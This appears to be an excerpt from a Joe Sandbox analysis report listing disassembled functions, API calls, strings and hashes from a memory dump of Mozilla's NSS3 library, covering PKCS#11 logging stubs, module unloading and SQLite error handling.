Opcode ID: 3e0d60fdccf017bf75f61b26cf91f13aa65127457cb5011e66354a34df3d9407
Instruction ID: ebd6233693c40b858326948419c1691b7a416709ff1b7f12918920240f522fc8
Opcode Fuzzy Hash: 3e0d60fdccf017bf75f61b26cf91f13aa65127457cb5011e66354a34df3d9407
Instruction Fuzzy Hash: 2551E3B1A043019BE700CF29DC81B9BBBF8AF95318F054529E85997741E731E945CBD7

Function 6C5A2DD0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitPIN), ref: 6C5A2DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5A2E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5A2E33

Part of subcall function 6C68D930: PL_strncpyz.NSS3(?,?,?), ref: 6C68D963

PR_LogPrint.NSS3(?,00000000), ref: 6C5A2E49
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C5A2E68
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C5A2E81

Strings

C_InitPIN, xrefs: 6C5A2DF1
nhl, xrefs: 6C5A2E99, 6C5A2EC4
ulPinLen = %d, xrefs: 6C5A2E7C
hSession = 0x%x, xrefs: 6C5A2E0E, 6C5A2E1E
(CK_INVALID_HANDLE), xrefs: 6C5A2E2C
pPin = 0x%p, xrefs: 6C5A2E63

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN$nhl
API String ID: 1003633598-3803057233
Opcode ID: baa639c95a3d6c05c347d819f51e49c2f7bd4717d4f12cc1112b1b198cebb9bb
Instruction ID: 05db262c1184afa20151fcaab40b50f8112109c0a2c79e5db9340a7c15a3af5c
Opcode Fuzzy Hash: baa639c95a3d6c05c347d819f51e49c2f7bd4717d4f12cc1112b1b198cebb9bb
Instruction Fuzzy Hash: CB31F575602114EBCB108F97DD8DB6E77B5EB86318F044025E90DA7A11DB30AC49CBAD

Function 6C5A7E00 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_VerifyUpdate), ref: 6C5A7E26
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5A7E54
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5A7E63

Part of subcall function 6C68D930: PL_strncpyz.NSS3(?,?,?), ref: 6C68D963

PR_LogPrint.NSS3(?,00000000), ref: 6C5A7E79
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C5A7E98
PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6C5A7EB1

Strings

pPart = 0x%p, xrefs: 6C5A7E93
ulPartLen = %d, xrefs: 6C5A7EAC
nhl, xrefs: 6C5A7EC9, 6C5A7EF7
C_VerifyUpdate, xrefs: 6C5A7E21
hSession = 0x%x, xrefs: 6C5A7E3E, 6C5A7E4E
(CK_INVALID_HANDLE), xrefs: 6C5A7E5C

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_VerifyUpdate$nhl
API String ID: 1003633598-3093644925
Opcode ID: 9217053828901cdbc98e0068bc8eb636160c9ca55909d8b127ba0cd7ae9891f8
Instruction ID: e237caa119e7dcd5ccdb2620a22ce0ff81423e0e396159acdc14ee74c4fe40b1
Opcode Fuzzy Hash: 9217053828901cdbc98e0068bc8eb636160c9ca55909d8b127ba0cd7ae9891f8
Instruction Fuzzy Hash: 51310734A02115EBDB108FA6DC88F9F7BB4EB86359F048025E90857A11DB30AD09CBED

Function 6C5A6EF0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestUpdate), ref: 6C5A6F16
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5A6F44
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5A6F53

Part of subcall function 6C68D930: PL_strncpyz.NSS3(?,?,?), ref: 6C68D963

PR_LogPrint.NSS3(?,00000000), ref: 6C5A6F69
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C5A6F88
PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6C5A6FA1

Strings

pPart = 0x%p, xrefs: 6C5A6F83
ulPartLen = %d, xrefs: 6C5A6F9C
nhl, xrefs: 6C5A6FB9, 6C5A6FE7
hSession = 0x%x, xrefs: 6C5A6F2E, 6C5A6F3E
(CK_INVALID_HANDLE), xrefs: 6C5A6F4C
C_DigestUpdate, xrefs: 6C5A6F11

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_DigestUpdate$nhl
API String ID: 1003633598-1202255146
Opcode ID: a6504b5c59aa0ca2622341de5d85e4eb6c0b4c86cb1b357c203e7f26da54091d
Instruction ID: 464fdec488a9caea3cb14b5ef6c6d3026e59da0eb8ca7dbfeb83d42734b0b09f
Opcode Fuzzy Hash: a6504b5c59aa0ca2622341de5d85e4eb6c0b4c86cb1b357c203e7f26da54091d
Instruction Fuzzy Hash: DE31D534602154EFDB00DF5ADC88B5E77B1EB8A318F044425E90897A11DB30ED49CBAD

Function 6C5A7F30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_VerifyFinal), ref: 6C5A7F56
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5A7F84
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5A7F93

Part of subcall function 6C68D930: PL_strncpyz.NSS3(?,?,?), ref: 6C68D963

PR_LogPrint.NSS3(?,00000000), ref: 6C5A7FA9
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6C5A7FC8
PR_LogPrint.NSS3( ulSignatureLen = %d,?), ref: 6C5A7FE1

Strings

ulSignatureLen = %d, xrefs: 6C5A7FDC
nhl, xrefs: 6C5A7FF9, 6C5A8027
C_VerifyFinal, xrefs: 6C5A7F51
hSession = 0x%x, xrefs: 6C5A7F6E, 6C5A7F7E
(CK_INVALID_HANDLE), xrefs: 6C5A7F8C
pSignature = 0x%p, xrefs: 6C5A7FC3

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pSignature = 0x%p$ ulSignatureLen = %d$ (CK_INVALID_HANDLE)$C_VerifyFinal$nhl
API String ID: 1003633598-3430269253
Opcode ID: d095d480d81d444f18ad8045fcaece2798a1f47e17260c401c844acf36368d3d
Instruction ID: bfe4e6dce1b7876656251541bb3ba6440fafde354ff7833aebf90af13baafaaa
Opcode Fuzzy Hash: d095d480d81d444f18ad8045fcaece2798a1f47e17260c401c844acf36368d3d
Instruction Fuzzy Hash: C631F334602154EFDB00DF97DC88F9E77B1EB8A359F048421E9099B611DB30AD49CBAE

Function 6C56AF30 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C56AF47

Part of subcall function 6C639090: TlsGetValue.KERNEL32 ref: 6C6390AB
Part of subcall function 6C639090: TlsGetValue.KERNEL32 ref: 6C6390C9
Part of subcall function 6C639090: EnterCriticalSection.KERNEL32 ref: 6C6390E5
Part of subcall function 6C639090: TlsGetValue.KERNEL32 ref: 6C639116
Part of subcall function 6C639090: LeaveCriticalSection.KERNEL32 ref: 6C63913F

FreeLibrary.KERNEL32(?), ref: 6C56AF6D
free.MOZGLUE(?), ref: 6C56AFA4
free.MOZGLUE(?), ref: 6C56AFAA
PR_ExitMonitor.NSS3 ref: 6C56AFB5
PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6C56AFF5
PR_ExitMonitor.NSS3 ref: 6C56B005
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C56B014
PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6C56B028
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C56B03C

Strings

Unloaded library %s, xrefs: 6C56B023
%s decr => %d, xrefs: 6C56AFF0

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
String ID: %s decr => %d$Unloaded library %s
API String ID: 4015679603-2877805755
Opcode ID: 3910642e2a4a544a1007db72614fe345e833c8517687d883b67734e3815a7f00
Instruction ID: bc845a55ce8e3910985a38d1e67863b5b7ce2e46b31f65c9eb256b84faa52a9c
Opcode Fuzzy Hash: 3910642e2a4a544a1007db72614fe345e833c8517687d883b67734e3815a7f00
Instruction Fuzzy Hash: 4A31C5B9A04121ABEB01EF66DC80A55F7B5EF46318F144525E80697E21F722F814CBEA

Function 6C5B6C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C5B781D,00000000,6C5ABE2C,?,6C5B6B1D,?,?,?,?,00000000,00000000,6C5B781D), ref: 6C5B6C40
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C5B781D,?,6C5ABE2C,?), ref: 6C5B6C58
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C5B781D), ref: 6C5B6C6F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C5B6C84
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C5B6C96

Part of subcall function 6C561240: TlsGetValue.KERNEL32(00000040,?,6C56116C,NSPR_LOG_MODULES), ref: 6C561267
Part of subcall function 6C561240: EnterCriticalSection.KERNEL32(?,?,?,6C56116C,NSPR_LOG_MODULES), ref: 6C56127C
Part of subcall function 6C561240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C56116C,NSPR_LOG_MODULES), ref: 6C561291
Part of subcall function 6C561240: PR_Unlock.NSS3(?,?,?,?,6C56116C,NSPR_LOG_MODULES), ref: 6C5612A0

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C5B6CAA

Strings

dbm:, xrefs: 6C5B6C3A
NSS_DEFAULT_DB_TYPE, xrefs: 6C5B6C91
extern:, xrefs: 6C5B6C7E
sql:, xrefs: 6C5B6C52
dbm, xrefs: 6C5B6CA4
rdb:, xrefs: 6C5B6C69

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
API String ID: 4221828374-3736768024
Opcode ID: 097a6a0330539c598fd78381a14399d94483d367def5d158cff685a8bc470227
Instruction ID: 41a4d8887b7d8a78869d60cfa52cc5568cd8baaf16449ef15412d521e8a97de0
Opcode Fuzzy Hash: 097a6a0330539c598fd78381a14399d94483d367def5d158cff685a8bc470227
Instruction Fuzzy Hash: 6C01A7B17033053BEA00277A5DA9F26395C9F52158F180431FE05F0941EFB2E62645BD

Function 6C5C4E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON

Download Yara Rule

APIs

PR_SetErrorText.NSS3(00000000,00000000,?,6C5878F8), ref: 6C5C4E6D

Part of subcall function 6C5609E0: TlsGetValue.KERNEL32(00000000,?,?,?,6C5606A2,00000000,?), ref: 6C5609F8
Part of subcall function 6C5609E0: malloc.MOZGLUE(0000001F), ref: 6C560A18
Part of subcall function 6C5609E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6C560A33

PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6C5878F8), ref: 6C5C4ED9

Part of subcall function 6C5B5920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6C5B7703,?,00000000,00000000), ref: 6C5B5942
Part of subcall function 6C5B5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C5B7703), ref: 6C5B5954
Part of subcall function 6C5B5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C5B596A
Part of subcall function 6C5B5920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C5B5984
Part of subcall function 6C5B5920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6C5B5999
Part of subcall function 6C5B5920: free.MOZGLUE(00000000), ref: 6C5B59BA
Part of subcall function 6C5B5920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6C5B59D3
Part of subcall function 6C5B5920: free.MOZGLUE(00000000), ref: 6C5B59F5
Part of subcall function 6C5B5920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6C5B5A0A
Part of subcall function 6C5B5920: free.MOZGLUE(00000000), ref: 6C5B5A2E
Part of subcall function 6C5B5920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6C5B5A43

SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6C5878F8), ref: 6C5C4EB3

Part of subcall function 6C5C4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C5C4EB8,?,?,?,?,?,?,?,?,?,?,6C5878F8), ref: 6C5C484C
Part of subcall function 6C5C4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C5C4EB8,?,?,?,?,?,?,?,?,?,?,6C5878F8), ref: 6C5C486D
Part of subcall function 6C5C4820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C5C4EB8,?), ref: 6C5C4884

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C5878F8), ref: 6C5C4EC0

Part of subcall function 6C5C4470: TlsGetValue.KERNEL32(00000000,?,6C587296,00000000), ref: 6C5C4487
Part of subcall function 6C5C4470: EnterCriticalSection.KERNEL32(?,?,?,6C587296,00000000), ref: 6C5C44A0
Part of subcall function 6C5C4470: PR_Unlock.NSS3(?,?,?,?,6C587296,00000000), ref: 6C5C44BB

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C5878F8), ref: 6C5C4F16
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C5878F8), ref: 6C5C4F2E
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C5878F8), ref: 6C5C4F40
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C5878F8), ref: 6C5C4F6C
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C5878F8), ref: 6C5C4F80
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C5878F8), ref: 6C5C4F8F
PK11_UpdateSlotAttribute.NSS3(?,6C69DCB0,00000000), ref: 6C5C4FFE
PK11_UserDisableSlot.NSS3(0000001E), ref: 6C5C501F
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6C5878F8), ref: 6C5C506B

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
String ID:
API String ID: 560490210-0
Opcode ID: c72f2e77c7c9cc2d0964555400f425a833ddb8fb5b2fbd8923e609c557eb83a9
Instruction ID: 0312afce1584aab97947d6f3ec4d01314a9947380b44b23d1bde9fe8e18e99e0
Opcode Fuzzy Hash: c72f2e77c7c9cc2d0964555400f425a833ddb8fb5b2fbd8923e609c557eb83a9
Instruction Fuzzy Hash: 1951F1B1E00201EBEB019FA5EC41AAA77B4EF4531DF180539EC0696B11FB31E918CAD3

Function 6C56ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C56ACE2
malloc.MOZGLUE(00000001), ref: 6C56ACEC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C56AD02
TlsGetValue.KERNEL32 ref: 6C56AD3C
calloc.MOZGLUE(00000001,?), ref: 6C56AD8C
PR_Unlock.NSS3 ref: 6C56ADC0
free.MOZGLUE(00000000), ref: 6C56AE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C56AE58
free.MOZGLUE(00000000), ref: 6C56AE69
free.MOZGLUE(?), ref: 6C56AE78
PR_Unlock.NSS3 ref: 6C56AE8C
free.MOZGLUE(?), ref: 6C56AEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C56AEC7

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: 4a0bbd08c6bf54f5b27a86392d8a2695a30a5d446bb67c99902ddca0e472ebaf
Instruction ID: ab21da25b2b3cc51c4cbd818e9b7d2835df54f39f80425bc60615cfbcff05a6e
Opcode Fuzzy Hash: 4a0bbd08c6bf54f5b27a86392d8a2695a30a5d446bb67c99902ddca0e472ebaf
Instruction Fuzzy Hash: 2951BFB0E01125ABDF00DF9BDC856AE77B4BB06359F140525E805A3F20D771AE45CBEA

Function 6C644C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_value_text16.NSS3(?), ref: 6C644CAF
sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C644CFD
sqlite3_value_text16.NSS3(?), ref: 6C644D44

Strings

out of memory, xrefs: 6C644C78, 6C644C9E
API call with %s database connection pointer, xrefs: 6C644CF6
bad parameter or other API misuse, xrefs: 6C644D05
another row available, xrefs: 6C644D20
invalid, xrefs: 6C644CF1
abort due to ROLLBACK, xrefs: 6C644D27, 6C644D33
no more rows available, xrefs: 6C644D2E
unknown error, xrefs: 6C644D56

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: sqlite3_value_text16$sqlite3_log
String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
API String ID: 2274617401-4033235608
Opcode ID: 2a134e23f2f4d13d24360503ba3ba64ccbf761c43a93fe28bcb17ac1fad3c205
Instruction ID: 4a400ebb67411f4425b8ee449ad6418397ee11a9a3e4cc7b13e0d0f50a5e114a
Opcode Fuzzy Hash: 2a134e23f2f4d13d24360503ba3ba64ccbf761c43a93fe28bcb17ac1fad3c205
Instruction Fuzzy Hash: 95315872A09951A7D7084E25A8037F5B3A27B82318F19C125D8245BE55CFE1AC22C7EE

Function 6C5A2CD0 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitToken), ref: 6C5A2CEC
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C5A2D07

Part of subcall function 6C6809D0: PR_Now.NSS3 ref: 6C680A22
Part of subcall function 6C6809D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C680A35
Part of subcall function 6C6809D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C680A66
Part of subcall function 6C6809D0: PR_GetCurrentThread.NSS3 ref: 6C680A70
Part of subcall function 6C6809D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C680A9D
Part of subcall function 6C6809D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C680AC8
Part of subcall function 6C6809D0: PR_vsmprintf.NSS3(?,?), ref: 6C680AE8
Part of subcall function 6C6809D0: EnterCriticalSection.KERNEL32(?), ref: 6C680B19
Part of subcall function 6C6809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C680B48
Part of subcall function 6C6809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C680C76
Part of subcall function 6C6809D0: PR_LogFlush.NSS3 ref: 6C680C7E

PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C5A2D22

Part of subcall function 6C6809D0: OutputDebugStringA.KERNEL32(?), ref: 6C680B88
Part of subcall function 6C6809D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C680C5D
Part of subcall function 6C6809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C680C8D
Part of subcall function 6C6809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C680C9C
Part of subcall function 6C6809D0: OutputDebugStringA.KERNEL32(?), ref: 6C680CD1
Part of subcall function 6C6809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C680CEC
Part of subcall function 6C6809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C680CFB
Part of subcall function 6C6809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C680D16
Part of subcall function 6C6809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C680D26
Part of subcall function 6C6809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C680D35
Part of subcall function 6C6809D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C680D65
Part of subcall function 6C6809D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C680D70
Part of subcall function 6C6809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C680D90
Part of subcall function 6C6809D0: free.MOZGLUE(00000000), ref: 6C680D99

PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C5A2D3B

